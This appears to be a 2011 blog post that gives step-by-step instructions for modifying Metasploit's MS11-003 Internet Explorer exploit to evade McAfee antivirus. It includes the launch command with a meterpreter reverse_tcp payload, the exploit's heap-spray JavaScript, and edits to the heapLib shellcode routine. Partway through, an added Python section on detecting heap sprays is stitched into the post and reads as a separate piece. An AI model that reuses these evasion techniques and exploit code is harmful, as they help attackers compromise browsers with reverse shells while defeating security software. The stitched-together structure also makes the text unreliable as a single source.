Channel: Fun Over IP

100% Anti-Virus evasion with Metasploit browser exploits (example with ms11-003)


1. Introduction

While Metasploit encoders are great tools for avoiding anti-virus detection of the payload (meterpreter, reverse_tcp, …), avoiding detection of the exploit itself is not always so easy.

No, this article is not yet another tutorial explaining how to type “set ENCODER xxxx” on your keyboard.

In this post, we will show you how to break the anti-virus detection of your favorite exploits by customizing them a bit (modifying the source code) using a trial-and-error method. Keep in mind that everybody is able to do this; sometimes you just don’t know it. This is why I wrote this article :-) .
In this demonstration, we will work with McAfee Anti-Virus. This does not mean that it will work with every other anti-virus vendor without further modification of the initial exploit, but the method will be the same.

2. Practical example

Let’s consider the browser exploit MS11-003 from Metasploit. Add your favorite payload to the exploit, set up your favorite encoder, and start it.

root@host:~/metasploit/trunk# ./msfcli windows/browser/ms11_003_ie_css_import \
SRVHOST=192.168.1.1 SRVPORT=8989 URIPATH=abc \
PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.1 \
LPORT=4444 ENCODER=x86/shikata_ga_nai E
[*] Please wait while we load the module tree...

 |                    |      _) |
 __ `__ \   _ \ __|  _` |  __| __ \  |  _ \  | __|
 |   |   |  __/ |   (   |\__ \ |   | | (   | | |
_|  _|  _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__|
 _|

 =[ metasploit v3.7.0-dev [core:3.7 api:1.0]
+ -- --=[ 671 exploits - 347 auxiliary
+ -- --=[ 217 payloads - 27 encoders - 8 nops
 =[ svn r12169 updated today (2011.03.28)

SRVHOST => 192.168.1.1
SRVPORT => 8989
URIPATH => abc
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.1
LPORT => 4444
ENCODER => x86/shikata_ga_nai
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.1:4444
[*] Using URL: http://192.168.1.1:8989/abc
[*] Server started.
msf exploit(ms11_003_ie_css_import) >

Now, test the exploit with your favorite browser. What happens?

The payload is not detected by our anti-virus (as expected), but the exploit is!

So what do we do now?

3. Breaking the Anti-Virus signature

As you know, the biggest part of an anti-virus product’s job is signature-based detection.

In this case, the exploit is JavaScript/HTML based. Therefore, it should not be too difficult for us to modify its source code so that it no longer matches the AV signature.

3.1 Find the signature

The first step is to find the part of the exploit which triggers the Anti-Virus signature.

First, open the Metasploit exploit with your text editor and locate the “evil part”.

root@host:~/metasploit/trunk# vi modules/exploits/windows/browser/ms11_003_ie_css_import.rb



 .....

 js_function  = rand_text_alpha(rand(100)+1)

 # Construct the javascript
 custom_js = <<-EOS
function #{js_function}() {
heap = new heapLib.ie(0x20000);
var heapspray = unescape("#{special_sauce}");
while(heapspray.length < 0x1000) heapspray += unescape("%u4444");
var heapblock = heapspray;
while(heapblock.length < 0x40000) heapblock += heapblock;
finalspray = heapblock.substring(2, 0x40000 - 0x21);
for(var counter = 0; counter < 500; counter++) { heap.alloc(finalspray); }
var vlink = document.createElement("link");
vlink.setAttribute("rel", "Stylesheet");
vlink.setAttribute("type", "text/css");
vlink.setAttribute("href", "#{placeholder}")
document.getElementsByTagName("head")[0].appendChild(vlink);
}
EOS

 .....

OK, this is the evil part, responsible for exploiting the IE vulnerability.

Now, open the generated HTML exploit file, located in your browser’s cache folder, and locate this piece of code. To do this, disable your anti-virus and edit the file (UV2gDc[1].htm in this example). As you can see, the JavaScript function has been obfuscated by Metasploit. Because you are a great hacker, you will have no difficulty recognizing it ;-)

Let’s modify this function a bit. For example, rename the variable “heap” to “hp”, and “heapspray” to “hps”.

Save and close the file, re-enable the anti-virus, and then try to re-open the file.

Damn, still detected! Note that the file is now detected as a Generic JavaScript backdoor.


OK, let’s modify the HTML source a bit more. Look at the following JavaScript function, especially its parameter names: function(shellcode, jmpecx, size)

bXOKT.RqyUZ.prototype.hePiPcA = function(shellcode, jmpecx, size) {

    var size = (size ? size : 1008);
    if ((size & 0xf) != 0)
        throw "Vtable size " + size + " must be a multiple of 16";

    if (shellcode.length*2 > size-138)
        throw("Maximum shellcode length is " + (size-138) + " bytes");

    var hePiPcA = unescape("%u9090%u7ceb");

    for (var i = 0; i < 124/4; i++)
        hePiPcA += this.tYJSbsU(jmpecx);

    hePiPcA += unescape("%u0028%u0028") +
        shellcode + heap.TSfqldDBQQFXY((size-138)/2 - shellcode.length);
    return hePiPcA;
}



Honestly, if I were an anti-virus vendor, I would be suspicious of such parameter names. “shellcode” and “jmpecx” don’t smell too good to me. Let’s rename these parameters to “sc” (for shellcode) and “je” (for jmpecx). Don’t forget to rename the variables in the function body as well.

bXOKT.RqyUZ.prototype.hePiPcA = function(sc, je, size) {

    var size = (size ? size : 1008);
    if ((size & 0xf) != 0)
        throw "Vtable size " + size + " must be a multiple of 16";

    if (sc.length*2 > size-138)
        throw("Maximum shellcode length is " + (size-138) + " bytes");

    var hePiPcA = unescape("%u9090%u7ceb");

    for (var i = 0; i < 124/4; i++)
        hePiPcA += this.tYJSbsU(je);

    hePiPcA += unescape("%u0028%u0028") +
        sc + heap.TSfqldDBQQFXY((size-138)/2 - sc.length);
    return hePiPcA;
}

Save and close the HTML file, re-enable the anti-virus, then try to reopen the file.

BINGO! The anti-virus doesn’t complain anymore.
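To look at the same result from the detection side, here is an added example (not from the original post, not Metasploit code, and not McAfee’s real signature, which the post never shows). It runs two toy rules over constructed JavaScript samples shaped like the spray function above, before and after the rename: a literal-identifier signature of the kind a rename defeats, and a structure-based heap-spray heuristic keyed on what the code does rather than on what its variables are called. The sample values, rule names and the two-indicator threshold are assumptions made for this illustration.

```python
"""Added example (not from the original post or from Metasploit): a toy comparison of
a literal-identifier signature against a structure-based heap-spray heuristic, run
over constructed JavaScript samples shaped like the function shown in the post."""
import re

# Constructed sample: the spray function roughly as the module emits it, with the
# original identifier names. "%u4141%u4141" stands in for the post's #{special_sauce}.
ORIGINAL_JS = """
function abc() {
heap = new heapLib.ie(0x20000);
var heapspray = unescape("%u4141%u4141");
while(heapspray.length < 0x1000) heapspray += unescape("%u4444");
var heapblock = heapspray;
while(heapblock.length < 0x40000) heapblock += heapblock;
finalspray = heapblock.substring(2, 0x40000 - 0x21);
for(var counter = 0; counter < 500; counter++) { heap.alloc(finalspray); }
}
"""

# Constructed sample: the same function after the rename described in the post
# (heap -> hp, heapspray -> hps). Behaviour is identical; only the names changed.
RENAMED_JS = """
function abc() {
hp = new heapLib.ie(0x20000);
var hps = unescape("%u4141%u4141");
while(hps.length < 0x1000) hps += unescape("%u4444");
var heapblock = hps;
while(heapblock.length < 0x40000) heapblock += heapblock;
finalspray = heapblock.substring(2, 0x40000 - 0x21);
for(var counter = 0; counter < 500; counter++) { hp.alloc(finalspray); }
}
"""

# Constructed benign sample: a loop and an unescape() call, but no spray structure.
BENIGN_JS = """
var items = [];
for (var i = 0; i < 10; i++) { items.push(unescape("%20hello")); }
"""

# A literal-identifier rule: brittle, because it keys on a name the author can change.
LITERAL_SIGNATURE = re.compile(r"var\s+heapspray\s*=\s*unescape\(")

def literal_signature_hits(js):
    """True if the literal-name signature matches (the rule a rename defeats)."""
    return LITERAL_SIGNATURE.search(js) is not None

# Structure-based indicators: keyed on what a spray does, not on what it is called.
UNESCAPE_UNICODE = re.compile(r'unescape\("(?:%u[0-9a-fA-F]{4})+"\)')
SELF_DOUBLING_LOOP = re.compile(
    r"while\s*\(\s*(\w+)\.length\s*<\s*0x[0-9a-fA-F]+\s*\)\s*\1\s*\+=\s*\1\s*;")
ALLOC_IN_LOOP = re.compile(r"for\s*\([^)]*\)\s*\{\s*\w+\.alloc\(\w+\)\s*;?\s*\}")

def heap_spray_indicators(js):
    """Count the structural features independently of identifier names."""
    return {
        "unescape_unicode_literals": len(UNESCAPE_UNICODE.findall(js)),
        "self_doubling_loop": SELF_DOUBLING_LOOP.search(js) is not None,
        "alloc_in_loop": ALLOC_IN_LOOP.search(js) is not None,
    }

def structural_heuristic_hits(js, min_indicators=2):
    """True when at least min_indicators of the three spray features are present."""
    ind = heap_spray_indicators(js)
    score = (int(ind["unescape_unicode_literals"] > 0)
             + int(ind["self_doubling_loop"]) + int(ind["alloc_in_loop"]))
    return score >= min_indicators

if __name__ == "__main__":
    for name, js in (("original", ORIGINAL_JS), ("renamed", RENAMED_JS), ("benign", BENIGN_JS)):
        print(f"{name:9s} literal={literal_signature_hits(js)!s:5s} "
              f"structural={structural_heuristic_hits(js)!s:5s} {heap_spray_indicators(js)}")
```

The literal rule stops matching after the rename, which is exactly what the post observes. The structural rule still fires on both versions, because it keys on the %u string literals, the self-doubling string loop and the alloc() loop rather than on names, and it stays quiet on the benign sample. It is a toy, not a production detector, but it shows why a signature keyed on identifier names is the easiest kind to break.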


3.2. Make the change in Metasploit source

We are almost done. Now that we have successfully broken the AV signature, we will apply the modifications to Metasploit and try the exploit again from the beginning.

Reopen the exploit source from the Metasploit directory, and rename the heap and heapspray variables as we did in the previous section.

root@host:~/metasploit/trunk# vi modules/exploits/windows/browser/ms11_003_ie_css_import.rb



 .....

 js_function  = rand_text_alpha(rand(100)+1)

 # Construct the javascript
 custom_js = <<-EOS
function #{js_function}() {
hp = new heapLib.ie(0x20000);
var hps = unescape("#{special_sauce}");
while(hps.length < 0x1000) hps += unescape("%u4444");
var heapblock = hps;
while(heapblock.length < 0x40000) heapblock += heapblock;
finalspray = heapblock.substring(2, 0x40000 - 0x21);
for(var counter = 0; counter < 500; counter++) { hp.alloc(finalspray); }
var vlink = document.createElement("link");
vlink.setAttribute("rel", "Stylesheet");
vlink.setAttribute("type", "text/css");
vlink.setAttribute("href", "#{placeholder}")
document.getElementsByTagName("head")[0].appendChild(vlink);
}
EOS

 .....



Now, where is the second function we modified located? You will not find it in the exploit itself.

The answer is a bit below the evil code:

custom_js = ::Rex::Exploitation::ObfuscateJS.new(custom_js, opts)
js = heaplib(custom_js)

HeapLib is a JavaScript library used to manage the heap during a browser exploit. More information about HeapLib is available at http://blog.metasploit.com/2007/04/heaplib-support-added-to-metasploit-3.html

HeapLib is located under your Metasploit directory structure at ./lib/rex/exploitation/heaplib.js.b64. Note that the file is base64 encoded.


Our last steps are now to:

  • Back up this file :-)
  • Decode the file. Copy/paste the content into one of these base64 decoders: http://www.google.com/search?q=base64+decode
  • Modify the decoded code by changing the parameter names, as we did in the previous section (for example, rename “shellcode” to “sc” and “jmpecx” to “je”).
  • Re-encode the new content as base64.
  • Replace the file ./lib/rex/exploitation/heaplib.js.b64 with the new content.



It is time to test everything. Restart the exploit (if Metasploit is still running, close it first). If you did not introduce any errors into the Metasploit files, you should now be able to use this exploit with 100% anti-virus evasion.

Note that in our demonstration, we used McAfee as the anti-virus. This does not mean that further modifications won’t be necessary to bypass other anti-virus software!

Enjoy !


© 2011, foip. All rights reserved.

